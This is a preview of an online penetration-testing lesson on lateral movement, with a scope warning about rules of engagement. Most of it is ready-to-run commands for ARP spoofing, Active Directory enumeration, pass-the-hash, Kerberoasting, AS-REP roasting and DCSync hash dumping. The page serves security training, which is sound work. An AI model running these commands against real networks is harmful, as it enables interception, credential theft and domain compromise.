You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
Once you have compromised a single host, lateral movement is the process of pivoting through the network to reach higher-value targets — domain controllers, databases, file servers, and other critical infrastructure. This lesson covers network-level attacks, Active Directory exploitation, and pivoting techniques.
Scope warning: Lateral movement can quickly take you beyond your authorised scope. Always verify that each target is within the rules of engagement before proceeding.
ARP spoofing allows an attacker to intercept traffic between two hosts on the same network segment:
Normal Communication:
Host A ──────── Switch ──────── Host B
ARP Spoofed (Man-in-the-Middle):
Host A ──────── Attacker ──────── Host B
(intercepting traffic)
# Using arpspoof (part of dsniff)
# Enable IP forwarding first
echo 1 > /proc/sys/net/ipv4/ip_forward
# Spoof — tell the gateway you are the target
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.100
# Using Bettercap (more modern)
bettercap -iface eth0
> net.probe on
> set arp.spoof.targets 192.168.1.100
> arp.spoof on
> net.sniff on
Active Directory (AD) is the backbone of most corporate Windows networks. Compromising AD typically means compromising the entire organisation.
# Using BloodHound — maps AD attack paths visually
# 1. Collect data with SharpHound
.\SharpHound.exe -c All
# 2. Import the ZIP into BloodHound
# 3. Query for shortest path to Domain Admin
# Using PowerView (PowerShell)
Import-Module .\PowerView.ps1
Get-DomainUser
Get-DomainGroup -Identity "Domain Admins"
Get-DomainComputer
Find-LocalAdminAccess
If you capture an NTLM hash, you can authenticate without knowing the plaintext password:
# Using crackmapexec
crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# Using Impacket's psexec
impacket-psexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# Using Impacket's wmiexec (stealthier)
impacket-wmiexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Kerberoasting extracts service account TGS tickets, which can be cracked offline:
# Using Impacket
impacket-GetUserSPNs domain.local/user:password -dc-ip 192.168.1.10 -request
# Using Rubeus (on Windows)
.\Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# Crack with hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
Targets accounts with "Do not require Kerberos preauthentication" enabled:
# Using Impacket
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass
# Crack with hashcat
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
With sufficient AD privileges, extract all password hashes from the domain controller:
# Using Impacket's secretsdump
impacket-secretsdump domain.local/admin:password@192.168.1.10
# Using Mimikatz
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.